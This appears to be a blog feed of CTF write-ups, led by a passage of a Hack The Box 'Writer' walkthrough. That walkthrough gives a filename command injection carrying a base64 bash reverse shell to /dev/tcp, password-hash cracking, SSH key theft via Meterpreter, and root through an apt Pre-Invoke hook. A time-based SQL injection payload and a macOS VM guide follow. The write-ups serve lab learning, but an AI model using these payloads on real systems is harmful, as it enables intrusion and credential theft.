in image.filename: path = os.path.join('/var/www/writer.htb/writer/static/img/', image.filename) image.save(path) image = "/img/{}".format(image.filename)</code></pre> So it checks if .jpg</code> is in the filename and if it is, then it saves it to the static folder. So we now have a path to get a reverse shell: Upload file with malicious filename</li> Try to upload file via URL with file://</code></li> Inject code into the os.command()</code> call</li> </ol> Command Injection</h3> So, I constructed the following filename: 3.jpg & echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMC4xMC8zOTM5IDA+JjEK" | base64 -d | bash;</code> Evaluated, this will simply decode the base64 encoded payload and pipe it into bash. That payload base64 decoded is: bash -i >& /dev/tcp/10.10.10.10/3939 0>&1</code></pre> We are then able to upload the malicious file, and then also verify it exists by navigating to the /static/img</code> path of the website which will show us all the files. Then when we go to execute the payload by referencing the file through the file://</code> directive, we are given the following by the website: While this seems to have foiled our evil scheme, it is actually only a client side validation, so disabling this via inspect element or sending the payload via burpsuite bypasses this check entirely. Reverse Shell</h3> Then bam, we finally get a reverse shell: └─# nc -lvp 3939 Ncat: Version 7.92 ( https://nmap.org/ncat ) Ncat: Listening on :::3939 Ncat: Listening on 0.0.0.0:3939 Ncat: Connection from 10.10.11.101. Ncat: Connection from 10.10.11.101:35588. bash: cannot set terminal process group (1058): Inappropriate ioctl for device bash: no job control in this shell www-data@writer:/$ python3 -c 'import pty;pty.spawn("/bin/bash")' python3 -c 'import pty;pty.spawn("/bin/bash")' www-data@writer:/$</code></pre>Privilege Escalation</h2> Foothold Enumeration</h3> From here we can start to actually investigate the running processes and other things on the machine. Inspecting /etc/passwd</code> shows us the two main users of the box: kyle:x:1000:1000:Kyle Travis:/home/kyle:/bin/bash john:x:1001:1001:,,,:/home/john:/bin/bash</code></pre> Next we can look at what is running on the box: www-data@writer:/$ ss -tlpn ss -tlpn State Recv-Q Send-Q Local Address:Port Peer Address:Port Process LISTEN 0 50 0.0.0.0:445 0.0.0.0:* LISTEN 0 80 127.0.0.1:3306 0.0.0.0:* LISTEN 0 50 0.0.0.0:139 0.0.0.0:* LISTEN 0 10 127.0.0.1:8080 0.0.0.0:* users:(("python3",pid=381422,fd=4)) LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:* LISTEN 0 128 0.0.0.0:22 0.0.0.0:* LISTEN 0 100 127.0.0.1:25 0.0.0.0:* LISTEN 0 50 [::]:445 [::]:* LISTEN 0 50 [::]:139 [::]:* LISTEN 0 511 *:80 *:* LISTEN 0 128 [::]:22 [::]:*</code></pre> So, port 8080 can likely be assumed to be the second website we observed earlier in the Apache config file. Port 445, 139, 22, and 80 we already know from the nmap scan. Port 53 is most likely local DNS. Port 3306 is the MySQL database. But port 25 is SMTP so there is likely a mail server running on this machine. Continuing our research, we can now navigate to the writer2_project</code> directory, and we see more Python Django files, including a settings.py</code> file which could prove useful: www-data@writer:/var/www/writer2_project/writerv2$ cat settings.py | grep mysql 'ENGINE': 'django.db.backends.mysql', 'read_default_file': '/etc/mysql/my.cnf',</code></pre> This points us to another file which just happens to have database credentials in plaintext: www-data@writer:/var/www/writer2_project/writerv2$ tail /etc/mysql/my.cnf # Import all .cnf files from configuration directory !includedir /etc/mysql/conf.d/ !includedir /etc/mysql/mariadb.conf.d/ [client] database = dev user = djangouser password = DjangoSuperPassword default-character-set = utf8</code></pre>Database Inspection</h3> So now we can login to the database and inspect the tables: www-data@writer:/var/www/writer2_project/writerv2$ mysql -u djangouser -p Enter password: MariaDB [dev]> show tables; +----------------------------+ | Tables_in_dev | +----------------------------+ | auth_group | | auth_group_permissions | | auth_permission | | auth_user | | auth_user_groups | | auth_user_user_permissions | | django_admin_log | | django_content_type | | django_migrations | | django_session | +----------------------------+ 10 rows in set (0.001 sec)</code></pre> Let's take a closer look at the auth_user</code> table: MariaDB [dev]> select * from auth_user; +----+------------------------------------------------------------------------------------------+------------+--------------+----------+------------+-----------+-----------------+----------+-----------+----------------------------+ | id | password | last_login | is_superuser | username | first_name | last_name | email | is_staff | is_active | date_joined | +----+------------------------------------------------------------------------------------------+------------+--------------+----------+------------+-----------+-----------------+----------+-----------+----------------------------+ | 1 | pbkdf2_sha256$260000$wJO3ztk0fOlcbssnS1wJPD$bbTyCB8dYWMGYlz4dSArozTY7wcZCS7DV6l5dpuXM4A= | NULL | 1 | kyle | | | kyle@writer.htb | 1 | 1 | 2021-05-19 12:41:37.168368 | +----+------------------------------------------------------------------------------------------+------------+--------------+----------+------------+-----------+-----------------+----------+-----------+----------------------------+ 1 row in set (0.000 sec)</code></pre>Password Cracking</h3> Here we have a password hash for the user Kyle. Since we saw the user on the box, we can assume that this is probably also their local user password. Let's put it into hashcat and see what happens: └─# cat kyle.hash pbkdf2_sha256$260000$wJO3ztk0fOlcbssnS1wJPD$bbTyCB8dYWMGYlz4dSArozTY7wcZCS7DV6l5dpuXM4A= └─# hashcat -m 10000 kyle.hash --wordlist /usr/share/wordlists/rockyou.txt --show pbkdf2_sha256$260000$wJO3ztk0fOlcbssnS1wJPD$bbTyCB8dYWMGYlz4dSArozTY7wcZCS7DV6l5dpuXM4A=:marcoantonio</code></pre>Gaining Kyle</h3> This gives us the password marcoantonio</code> and using SSH we can now login as kyle and get user.txt: └─# ssh kyle@writer.htb kyle@writer.htb's password: Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64) kyle@writer:~$ cat user.txt <HASH></code></pre>Kyle Enumeration</h3> Now we need to escalate to root, but likely since there was another user on the box, we need to take a detour and gain the user john first. Looking at the groups that kyle is a member of we notice the filter</code> group in addition to the normal kyle</code> and smbgroup</code> kyle@writer:~$ cat /etc/group | grep kyle kyle:x:1000: filter:x:997:kyle smbgroup:x:1002:kyle</code></pre> Inspecting the box further, we can see that postfix is the service running on 25/tcp and coincidentally, the filter group exists on one of the files in the postfix configuration: kyle@writer:/etc/postfix$ ls -al total 140 drwxr-xr-x 5 root root 4096 Jul 9 10:59 . drwxr-xr-x 102 root root 4096 Jul 28 06:32 .. -rwxrwxr-x 1 root filter 1021 Dec 11 14:32 disclaimer -rw-r--r-- 1 root root 32 May 13 2021 disclaimer_addresses -rw-r--r-- 1 root root 749 May 13 2021 disclaimer.txt -rw-r--r-- 1 root root 60 May 13 2021 dynamicmaps.cf drwxr-xr-x 2 root root 4096 Jun 19 2020 dynamicmaps.cf.d -rw-r--r-- 1 root root 1330 May 18 2021 main.cf -rw-r--r-- 1 root root 27120 May 13 2021 main.cf.proto lrwxrwxrwx 1 root root 31 May 13 2021 makedefs.out -> /usr/share/postfix/makedefs.out -rw-r--r-- 1 root root 6373 Dec 11 14:32 master.cf -rw-r--r-- 1 root root 6208 May 13 2021 master.cf.proto -rw-r--r-- 1 root root 10268 Jun 19 2020 postfix-files drwxr-xr-x 2 root root 4096 Jun 19 2020 postfix-files.d -rwxr-xr-x 1 root root 11532 Jun 19 2020 postfix-script -rwxr-xr-x 1 root root 29872 Jun 19 2020 post-install drwxr-xr-x 2 root root 4096 Jun 19 2020 sasl</code></pre>Postfix Inspection</h3> Now, I had never used postfix before, so I was not really sure what to do with this, but if we look at the master.cf</code> configuration file we see the following: kyle@writer:~$ cat /etc/postfix/master.cf | grep john flags=Rq user=john argv=/etc/postfix/disclaimer -f ${sender} -- ${recipient}</code></pre> Doing some research into postfix, what is actually happening here is that postfix will execute the /etc/postfix/disclaimer</code> script when john receives an email. This is useful to us since we can edit the script that it executes! What is better is that using pspy64</code> we can see that when this executes, it executes as the user john: 2021/12/11 14:32:08 CMD: UID=1001 PID=378522 | /bin/sh /etc/postfix/disclaimer -f kyle@writer.htb -- john@writer.htb</code></pre> So now we have our path to escalate to john: Edit the /etc/postfix/disclaimer</code> script to call back to us.</li> Send an email to john.</li> The script will execute and give us a shell on the box.</li> </ol> Gaining John</h3> I prefer to use Meterpreter sessions rather than normal reverse shells as they call their own binary, so I generated a payload and copied it over. I also created the following little script to detatch the Meterpreter binary from the process which calls it, which should prevent my session from dying: kyle@writer:/tmp/.tempdir$ cat script.sh #!/bin/bash nohup /tmp/.tempdir/shell.elf &</code></pre> Now I just need to send an email to john somehow to get a callback. Luckily, this is pretty easy to do using python: kyle@writer:/tmp/.tempdir$ python3 Python 3.8.10 (default, Jun 2 2021, 10:49:15) [GCC 9.4.0] on linux Type "help", "copyright", "credits" or "license" for more information. >>> import smtplib >>> server = smtplib.SMTP("127.0.0.1", 25) >>> server.sendmail("kyle@writer.htb", "john@writer.htb", "Get me a shell!")</code></pre> And then we have a Meterpreter session: msf6 exploit(multi/handler) > [*] Sending stage (3012548 bytes) to 10.10.11.101 se[*] Meterpreter session 2 opened (10.10.10.10:4646 -> 10.10.11.101:34270 ) at 2021-12-11 09:16:54 -0500 ssions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 2 meterpreter x64/linux john @ 10.10.11.101 10.10.10.10:4646 -> 10.10.11.101:34270 (10.10.11.101)</code></pre> Using this, we can grab john's private SSH key: msf6 exploit(multi/handler) > sessions -i 2 [*] Starting interaction with 2... meterpreter > shell Process 377516 created. Channel 1 created. cat /home/john/.ssh/id_rsa -----BEGIN OPENSSH PRIVATE KEY----- -----END OPENSSH PRIVATE KEY----- exit meterpreter > bg [*] Backgrounding session 2...</code></pre> We can then put this in a file and SSH in as john using it: └─# vi john_id_rsa └─# chmod 600 john_id_rsa └─# ssh john@writer.htb -i john_id_rsa Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64) john@writer:~$</code></pre>John Enumeration</h3> Now, we finally can try to escalate to root. Inspecting processes with pspy64 you can see that periodically, the box is running apt-get update</code>: 2021/12/11 14:30:01 CMD: UID=0 PID=378422 | /bin/sh -c /usr/bin/apt-get update 2021/12/11 14:30:01 CMD: UID=0 PID=378421 | /usr/bin/cp -r /root/.scripts/writer2_project /var/www/ 2021/12/11 14:30:01 CMD: UID=0 PID=378420 | /usr/bin/find /etc/apt/apt.conf.d/ -mtime -1 -exec rm {} ; 2021/12/11 14:30:01 CMD: UID=??? PID=378419 | ??? 2021/12/11 14:30:01 CMD: UID=0 PID=378423 | /usr/bin/find /etc/apt/apt.conf.d/ -mtime -1 -exec rm {} ; 2021/12/11 14:30:01 CMD: UID=0 PID=378424 | /usr/bin/dpkg --print-foreign-architectures 2021/12/11 14:30:01 CMD: UID=0 PID=378425 | /usr/lib/apt/methods/http 2021/12/11 14:30:01 CMD: UID=0 PID=378426 | /usr/bin/apt-get update 2021/12/11 14:30:02 CMD: UID=33 PID=378427 | python3 manage.py runserver 127.0.0.1:8080</code></pre> In addition, it is also removing all apt configuration files with a modification time of a day. I guess this is supposed to prevent us from adding in our own configuration file to do what we want. Looking at the groups john is a member of, we see we are also in the management</code> group: john@writer:~$ cat /etc/group | grep john john:x:1001: management:x:1003:john</code></pre> Let's look at the apt configuration directory: john@writer:~$ ls -al /etc/apt/apt.conf.d total 48 drwxrwxr-x 2 root management 4096 Dec 11 14:29 . drwxr-xr-x 7 root root 4096 Jul 9 10:59 .. -rw-r--r-- 1 root root 630 Apr 9 2020 01autoremove -rw-r--r-- 1 root root 92 Apr 9 2020 01-vendor-ubuntu -rw-r--r-- 1 root root 129 Dec 4 2020 10periodic -rw-r--r-- 1 root root 108 Dec 4 2020 15update-stamp -rw-r--r-- 1 root root 85 Dec 4 2020 20archive -rw-r--r-- 1 root root 1040 Sep 23 2020 20packagekit -rw-r--r-- 1 root root 114 Nov 19 2020 20snapd.conf -rw-r--r-- 1 root root 625 Oct 7 2019 50command-not-found -rw-r--r-- 1 root root 182 Aug 3 2019 70debconf -rw-r--r-- 1 root root 305 Dec 4 2020 99update-notifier</code></pre> It looks like we cannot remove the files in the directory, but we can add our own files. Gaining Root</h3> So after some quick research, we can create a file with the following contents to execute our script to give as another Meterpreter session as root: john@writer:/etc/apt/apt.conf.d$ cat 02Update APT::Update::Pre-Invoke {"/tmp/.tempdir/script.sh"};</code></pre> That seems simple enough, but we also need to bypass the removal script. This can be done by changing the modify time to more than a day ago: john@writer:/etc/apt/apt.conf.d$ touch -d "29 hours ago" 02Update</code></pre> And now we wait for a shell: msf6 exploit(multi/handler) > [*] Sending stage (3012548 bytes) to 10.10.11.101 [*] Meterpreter session 3 opened (10.10.10.10:4646 -> 10.10.11.101:34762 ) at 2021-12-11 09:28:13 -0500 sessions Active sessions =============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 2 meterpreter x64/linux john @ 10.10.11.101 10.10.10.10:4646 -> 10.10.11.101:34270 (10.10.11.101) 3 meterpreter x64/linux root @ 10.10.11.101 10.10.10.10:4646 -> 10.10.11.101:34762 (10.10.11.101)</code></pre> Now we have a shell as root! From here we can get the root.txt and whatever else we want: msf6 exploit(multi/handler) > sessions -i 3 [*] Starting interaction with 3... meterpreter > shell Process 378346 created. Channel 1 created. cd cat root.txt <HASH></code></pre>Conclusion</h2> I had a lot of fun getting this box, although the initial foothold was very frustrating for me. Having read different writeups of this box, there are multiple paths you can take to get a shell, and I probably went down one of the hardest paths, but I recommend watching IppSec's video here</a> as he highlights all of the different avenues well, and he also goes over the proper way to do the SQL injection. SQL injection is definitely an area where I need to improve, and this box definitely taught me a lot about it. When Sqlmaps Attack! 2020-10-26T11:37:34-04:00 You can find this challenge here on my Github</a> if you don't have it. This challenge was a pain and a half to solve. Apparently, the pcap file is from a Time-Based SQL attack, which you can read more about here</a> in this article by sqlinjection.net. When I solved this, I did not know this and literally went off of just the pcap file and trying to understand them. Because of this, I solved it more by luck than anything. A good thing to note is that the hint for this challenge is to look at what is changing each request, and honestly, I ended up doing just that. The first thing I did was open the file in wireshark, and after parsing through the requests manually, I actually exported all of the packet captures matching the source IP of the attacker as a JSON file. With the JSON file open in vim, I was going query by query trying to figure out what was happening by searching for "http.file_data" . I eventually realized that it was usually the same query but with a different number on the end. Below you can find one of the queries inside of the script that called it: chopslider = $('.chopslider_id_1111111111 AND (SELECT 9747 FROM (SELECT(SLEEP(1-(IF(ORD(MID((SELECT IFNULL(CAST(user_pass AS NCHAR),0x20) FROM wordpress.wp_users ORDER BY ID LIMIT 0,1),7,1))>88,0,1)))))TSGM)')\n\t\twindow.chopslider1111111111 AND (SELECT 9747 FROM (SELECT(SLEEP(1-(IF(ORD(MID((SELECT IFNULL(CAST(user_pass AS NCHAR),0x20) FROM wordpress.wp_users ORDER BY ID LIMIT 0,1),7,1))>88</code></pre> On every query the end of the query ">88" would change to something else, eventually changing to !=NUM where NUM is a number of two to three digits. I randomly decided to start taking the numbers from the != and putting it into a decimal to ascii converter, query by query. While this took some time, I eventually started to see that it was spelling out some things; most notably jake@metactf.com. At some point, instead of manually doing this, I decided to use regex to parse this out, using the following command: cat queries.json | grep -o "!=..."</code></pre> This gives you all of the numbers, but the data is a little messy, and every three numbers are the same. So I had to use some more commands to clean it up a bit: To select only the third line: awk 'NR == 1 || NR % 3 == 0'</code></pre> To remove the != and any commas: tr -d \!\=\,</code></pre> And then I was able to copy all of them into an online decimal to ascii converter. For fun, here is how to remove the newlines to make it easier to copy as well: | tr '\n' ' ' && echo</code></pre> Putting it all together: cat queries.json | grep -o "!=..." | awk 'NR == 1 || NR % 3 == 0' | tr -d \!\=\, | tr '\n' ' ' && echo</code></pre> Lastly, copy this into a ascii to decimal converter to get the results: If you notice the underscores, you can see the flag: MetaCTF{its_all_fun_and_games_until_sqlmap_attacks_you}</code></pre> This challenge seemed weird at the time, but makes a lot more sense when you learn about time based attacks. I had fun solving this one since it was a really janky way to solve it but still worked as far as I can tell. Watermarked 2020-10-26T11:37:26-04:00 This challenge was interesting. It was essentially a steganography challenge with audio which made it unique in this CTF as there were only a few steg challenges. The challenge is here on my github</a> in case you do not have access to it. The first thing to do is to download the two files and open them in audacity. The next thing I did was reasearch until I stumbled accross this paper</a> (look at page 7) detailing different watermark formats. So going off of that, select all of one track then go to Effects and click on Invert. Lastly, select all of the tracks and do a mixdown to one track to get the answer (Tracks>Mix>Mix and Render). Then just listen to the audio for it to tell you the flag! MetaCTF{p4r7ing_7h3_w4v3z} </blockquote> [REDACTED] 2020-10-26T11:37:19-04:00 This will be a short but sweet writeup. You can find a backup of the challenge here on my GitHub</a> in case you don't have access to it. The challenge is simply to extract some data from a PDF file. When you open the PDF you are presented with this: Knowing this, it looked like there is just an image or drawing over what we want to see, so I did some research to find a suitable program to disassemble the PDF. I stumbled upon mutools which I installed in Kali: pt install mupdf-tools</code></pre> While the tutorial I was following had some complicated steps to get what I was looking for, I simply gave mutool extract cybercorp_memo.pdf</code></pre> This gave me the following image: And the follwing flag: MetaCTF{politics_are_for_puppets} </blockquote> And that's it! Just knowing the right tool for the job makes it pretty easy. Password Here Please 2020-10-26T11:37:11-04:00 If you look at the timestamps for my submissions during this CTF, you will see that between 12:50 and 7:30, there were no submissions. That is becasue for those six and a half hours I was working on this problem, particularly the last part. Also, I lost my notes for this problem, but never fear, I challenged myself to solve it again to do this writeup. If you do not have the challenge, you can find it here on my GitHub</a>. One thing to note is that at the beginning the convert to base 257 hint was not given. That was given around 5PM. First things first</h2> The first thing is that the string should be 24 characters long as is noted by this line: if(len(password[::-2]) != 12 or len(password[17:]) != 7)</code></pre> The "password[::-2]" means half of the string and the "password[17:]) != 7" means the last seven characters. So the Python program can be split into three different parts, each taking one third of the input string. The First Third</h2> This is the first part of the password checker: pwlen = len(password) chunk1 = 'key'.join([chr(0x98 - ord(password[c])) for c in range(0, int(pwlen / 3))]) if "".join([c for c in chunk1[::4]]) != '&e"3&Ew*': print("You call that the password? HA!") return False</code></pre> The chunk1 variable is where you want to take note, it is simply subtracting all of the ascii codes of the string from 98 in hex which is 152 in decimal. And its comparing to the string '&e"3&Ew*'. We can create a quick formula using algebra to get the original characters: OG_CHAR = 152 - CONV_CHAR </blockquote> In decimal the string is: 38 101 34 51 38 69 119 42 </blockquote> subtracting all of these we get: 114 51 118 101 114 83 33 110 </blockquote> which equates to this in ascii: r3verS!n </blockquote> So now we have one third of the final flag. Ring around the for loop</h2> So now onto the second part: chunk2 = [ord(c) - 0x1F if ord(c) > 0x60 else (ord(c) + 0x1F if ord(c) > 0x40 else ord(c)) for c in password[int(pwlen / 3) : int(2 * pwlen / 3)]] ring = [54, -45, 9, 25, -42, -25, 31, -79] for i in range(0, len(chunk2)): if(0 if i == len(chunk2) - 1 else chunk2[i + 1]) != chunk2[i] + ring[i]: print("You cracked the passwo-- just kidding, try again! " + str(i)) return False</code></pre>The chonky second array</h3> Let's start with the chunk2 instruction. One thing to note here is that when you do a one line if or for statement, python is actually working backwards which is why it can be somewhat hard to understand. chunk2 = [ord(c) - 0x1F if ord(c) > 0x60 else (ord(c) + 0x1F if ord(c) > 0x40 else ord(c)) for c in password[int(pwlen / 3) : int(2 * pwlen / 3)]]</code></pre> THe first thing to note is that its looping over every character in the string from 9 to 16 inclusive. Next, its checking if the character code is greater than 60 in hex or 96 in decimal. If it is, it subtracts 1F hex (31 decimal) from the character, and we finish. Otherwise, it checks if the character is greater than 40 hex (64 decimal), if it is then it adds 1F hex (31 decimal) to the character, and otherwise it does nothing to the character. Also note that this statement is contained in brackets so the chunk2 is now an array of ascii codes in a numeric format. Here's an easier view I made (I didn't run this code so hopefully it's correct): chunk2 = [] for c in password[8:16]: if ord(c) > 96: chunk2.append(ord(c) - 31) elif ord(c) > 60: chunk2.append(ord(c) + 31) else: chunk2.append(ord(c))</code></pre>One ring to rule them all</h3> Now for the ring: ring = [54, -45, 9, 25, -42, -25, 31, -79] for i in range(0, len(chunk2)): if(0 if i == len(chunk2) - 1 else chunk2[i + 1]) != chunk2[i] + ring[i]: print("You cracked the passwo-- just kidding, try again! " + str(i)) return False</code></pre> This is iterating over all eight values in the chunk2 array and checking whether the next number is equal to the current number plus a certain value in the ring array. So let's leverage this to determine what the current value is: CURRENT_VALUE = NEXT_VALUE - CURRENT_RING </blockquote> But how does this help us? The trick here is that it does not check the last value in the ring against anything. But each value is equal to the next value subtracted from the current ring... There is no next value, or the next value is actually 0. Plugging into our formula: CURRENT_VALUE = 0 - (-79) = 79 </blockquote> So the last value in the array is 79. From there we can work backwards to determine the rest. p8 = 79 p7 = 79 - 31 = 48 p6 = 48 - (-25) = 73 p5 = 73 - (-42) = 115 p4 = 115 - 25 = 90 p3 = 90 - 9 = 81 p2 = 81 - (-45) = 126 p1 = 126 - 54 = 72</code></pre>Putting it together</h3> Okay cool, now we have the values, right? Not quite, now we need to undo the shifting that was done in the chunk2 instruction. So we need some math again: Anything that was greater than 96 will never be less than 65 97 - 31 = 66 </blockquote> 127 - 31 = 96 </blockquote> And anything that wasn't greater than 96 but was greater than 60 will never be greater than 127 or less than 91 96 + 31 = 127 </blockquote> 60 + 31 = 91 </blockquote> Well, of everything we have, everything is less than 127 so that does not help us. Only one thing is less than 66, 48 so we at least know that that is indeed 48. But we do know that the ascii table has a max of 127, so 115 and 126 could not have been greater than 96 so they are 84 and 95 respectively. 73, 72, 81, 79, and 90 are all less than 91 so they must have been greater than 96 before the shift so they are 104, 103, 112, 100, and 121 respectively. So we have the following conversions: 72 + 31 = 103 126 - 31 = 95 81 + 31 = 112 90 + 31 = 121 115 - 31 = 84 73 + 31 = 104 48 +- 0 = 48 79 + 31 = 110 103 95 112 121 84 104 48 110</code></pre> So now putting these values into a converter we get: g_pyTh0n </blockquote> So adding that with the first third we get: r3verS!ng_pyTh0n </blockquote> Cool, on to the final step. Sliding into 257th base</h2> This was by far the hardest step for me. I had everything, I understood the code perfectly, but I could not figure out the answer to save my life. But at 5:09 PM, the admins sent out a hint to try converting the long number into base 257, which in theory I realized should work. Now, it took me another two and a half hours to solve this, but that is because I tried to write a script to do a change of base. The lesson here is look for libraries to do random things you need to instead of re-inventing the wheel. Anyways enough story time, let's finish this thing. This is the final third of the problem: chunk3 = password[int(2 * pwlen / 3):] code = 0xaace63feba9e1c71ef460e6dbf1b1fbabfd7e2e35401440ac57e93bd9ba41c4fbd5d437b1dfab11fe7a1c6c2035982a71765fc9a7b32ccef695dffb71babe15733f5bb29f76aae5f80fff for i in range(0, len(chunk3)): code -= (257 ** (ord(chunk3[i]) - 0x28)) * (1 << i) if code == 0: print("Password accepted!") return True</code></pre> So there is a lot going on here, and also what is the "<<" operator? So many questions, so little time. Well the good news is that google is your friend. The "<<" operator is a left bit shift, something you've probably never used in Python. The "**" operator is just raising to the power, in case you were wondering. Order of operations</h3> So let's start with the inner parentheses. This is simply subtracting the ascii codes of all the characters by hex 28 (decimal 40). Next, we are raising 257 to the power of whatever that value is. Lastly, we are multiplying that by 1 shifted by whatever value i is. That value seems vague, but let's throw some logic at it. The shift operator is only used on binary numbers so Python will assume what is in that set of parentheses is in binary and will then convert it to decimal. In binary, the existence of a 1 means we multiply it by two raised to the power of the place of that value. So this entire operation can be thought of as 2 to the power of i which will be 1, 2, 4, 8, 16, 32, 64, and 128 depending on the value of i. The numbers, what do they mean?</h3> So all of these values are being subtracted from code, that obnoxiously large hex number. And then at the end, we check if that number equals zero. So we can surmise that all of our values added together equal that number. Now at this point, I found it useful to actually write out this equation, which oddly enough I have a photo of despite not having my original notes. (Please excuse my inconsistent spacing) So if you notice, I denote the exponents as c and then a number. These exponents are our characters, and we need to find them. But how? This is the question I contemplated for literally hours, until that hint was added to the problem. Base 257</h3> If we convert this number to base 257, it will have the numbers 1, 2, 4, 16, 32, 64, and 128 at different places in the number. Why you ask? Because this is essentially a base 257 expansion of the number. We do a similar thing when we write a decimal or binary expansion of a number. Fun fact: I at one point did mention to my teammate that this reminded me of a decimal expansion, but I didn't think to use base 257. So the question became, how do I convert to base 257? Well, that took me an hour and a half to figure out actually. See the issue was that I was trying to do it with online websites, and then I tried to do it with a Python script I wrote based on a StackOverFlow post. I'm still not entirely sure why my Python script didn't work, but it's all okay because I stumbled accross a Python library to do it for me. This Python library</a> is extremely useful to solve this. This nifty library will convert any number to any base and return the answer in a tuple. You can install it with pip install baseconvert</code></pre> Great, now I can write a quick script to display the number in base 257 and the place values of each number that is not 0: from baseconvert import base code = 0xaace63feba9e1c71ef460e6dbf1b1fbabfd7e2e35401440ac57e93bd9ba41c4fbd5d437b1dfab11fe7a1c6c2035982a71765fc9a7b32ccef695dffb71babe15733f5bb29f76aae5f80fff a = base(code, 10, 257) for x in range(len(a)): if a[x] != 0: print(len(a)- x -1, a[x])</code></pre> Executing this gives us the following output: 74 8 70 128 62 2 55 17 45 64 39 4 30 32</code></pre> Sweet, now we have our exponenets/characters. The last step</h3> The final step is to simply put these in order and add back 40 to shift them to their correct places: (you could even make the python script do this pretty easily) 1 55 + 40 = 95 2 62 + 40 = 102 4 39 + 40 = 79 8 74 + 40 = 114 16 55 + 40 = 95 32 30 + 40 = 70 64 45 + 40 = 85 128 70 + 40 = 110 95 102 79 104 95 70 85 110</code></pre> Let's throw this into a decimal to ascii converter real quick: _fOr_FUn </blockquote> Fin</h2> Okay, putting it all together: MetaCTF{r3verS!ng_pyTh0n_fOr_FUn} </blockquote> Ironically, it's so fun, that I'm doing it twice. Let's run this through the python program real quick to double check: Amazing! (Note: I had to put my input into quotes on Kali for some reason for it to work.) This was honestly my favorite challenge in the CTF just because it was so difficult but still solveable in a creative and unique way. Thanks for the MetaCTF team for an outstanding CTF, and I can't wait to do it again next year! Checkmate in 1 2020-10-26T11:32:23-04:00 Checkmate in 1</h1> This challenge was interesting, because I actually found it relatively easy while my teammates could not figure it out earlier during the competition. Keep in mind that this was probably the last challenge I solved, and I think I solved it around 3:30 - 4:00 AM on Sunday. Anyways enough talk lets get into the challenge. You can find a backup of the challenge here on my Github</a> just in case you don't have access to it. The basics of the challenge is we had the string "F^mY;L?t24Zk.m^-hnWl,[l)[ku" and nine different img of chessboards. The only other thing to note is that the flag is wrapped with MetaCTF{} which means that the first eight characters of the string is MetaCTF{. Solving the Chessboards</h2> The first thing I needed to do was solve the actual chessboards, the first of which is pictured below: The solution is how can you move a white piece to cause checkmate in a single move. I am not a chess player, but fortunately one of my teammates had been working on the challenge before and was able to provide me with the following solutions: 1: Queen from c2 to h7 2: Rook from e1 to e8 3: Rook from c7 to e7 4: Pawn from d4 to d5 5: Bishop from f1 to b5 6: Knight from c4 to b6 7: Rook from a1 to a8 8: Rook from h2 to h8 9: Queen from f6 to h8</code></pre>Cracking the Cipher</h2> Cool, now what do these mean. Well given that the first eight letters of the string are MetaCTF{ I decided to start with that: M (77) - F (70) = 7 e (101) - ^ (94) = 7 t (116) - m (109) = 7 a (97) - Y (89) = 8 C (67) - ; (59) = 8 T (84) - L (76) = 8 F (70) - ? (63) = 7 { (123) - t (116) = 7</code></pre> If you notice, I also provided the ascii character codes and their differences, notice anything? I did. I forgot to mention that while there are nine chessboards, there are also twenty-seven characters in the provided string. I already had a suspicion at this point that it was a shift cipher, so doing some math I hypothesised that each chessboard was the shift for three characters. If you notice the number in the solution to the first three chessboards corresponds to the shifts for the first eight characters. Going off of that we can do the same thing with all twenty-seven characters I constructed the following solution: M (77) - F (70) = 7 e (101) - ^ (94) = 7 t (116) - m (109) = 7 a (97) - Y (89) = 8 C (67) - ; (59) = 8 T (84) - L (76) = 8 F (70) - ? (63) = 7 { (123) - t (116) = 7 9 (57) - 2 (50) = 7 9 (57) - 4 (52) = 5 _ (95) - Z (90) = 5 p (112) - k (107) = 5 3 (51) - . (46) = 5 r (114) - m (109) = 5 c (99) - ^ (94) = 5 3 (51)- - (45) = 6 n (110) - h (104) = 6 t (116) - n (110) = 6 _ (95) - W (87) = 8 t (116) - l (108) = 8 4 (52) - , (44) = 8 c (99) - [ (91) = 8 t (116) - l (108) = 8 1 (49) - ) (41) = 8 c (99) - [ (91) = 8 s (115) - k (107) = 8 } (125) - u (117) = 8</code></pre> Since this was at 4:00 AM, I made a few mistakes initially mathwise, but eventually did solve it to get the following flag: MetaCTF{99_p3rc3nt_t4ct1cs} </blockquote> Creating a macOS Virtual Machine using KVM/QEMU on Linux 2020-06-08T13:50:27-04:00 Something I stumbled accross the other day was GitHub - foxlet/macOS-Simple-KVM: Tools to set up a quick macOS VM in QEMU, accelerated by KVM.</a> This script makes creating a macOS VM really simple, especially for someone who does not have access to an actual Mac. This script even enables you to install it headless to use with a server or cloud provider so that you can remotely use the VM through VNC or a similar method. Resolving Dependencies</h3> The first step is to install the necessary dependencies which will vary based on your distro. The GitHub readme lists the dependencies for most distrobutions, which comes down to qemu and python-pip. I would also recommend installing virt-manager to add a GUI for simplification of QEMU management. You will also need to install and enable the libvirtd service for this to work. Getting the Virtual Machine Setup</h3> You need to clone the repository of the script, but your disk will also live in this folder so make sure it is on a drive with probably at least 50 gigabytes of space on it. git clone https://github.com/foxlet/macOS-Simple-KVM.git </blockquote> Then go into the folder and execute the jumpstart script: cd macOs-Simple-KVM && ./jumpstart.sh </blockquote> This script will download the installation media and any other dependencies that the script needs. Now you need to actually create the virtual disk for the virtual machine. qemu-img create -f qcow2 <diskname>.qcow2 <size>G </blockquote> After creating that disk, you need to append it to the qemu command in basic.sh $EDITOR basic.sh </blockquote> -drive id=SystemDisk,if=none,file=<diskname>.qcow2 \ -device ide-hd,bus=sata.4,drive=SystemDisk \</code></pre> If you are intending to run this on a headless system, the readme also recommands adding the following options as well: -nographic -vnc :0 -k en-us</code></pre>Installing macOS on the Virtual Machine</h3> Now just run basic.sh to start the virtual machine with the Clover bootloader ./basic.sh </blockquote> The clover bootloader should come up, and you can select the first option here to boot into the recovery utility. First, make sure to format the drive using the disk utility so that the installer lets you use it. Then exit back into the recovery utility and select re-install macOS and follow the prompts to install. This will take a while and probably downloads dependencies from my experience. One important thing is to not sign into your AppleID at all until later as it may lock your AppleID because of the serial number of the VM. We will fix this later. Configuring the Virtual Machine and Enabling iMessage</h3> Adding RAM</h4> The first thing to do is to give the virtual machine more memory. Simply edit the basic.sh script again. Locate the line which has the -m 2G and edit it. $EDITOR basic.sh </blockquote> -m <amount 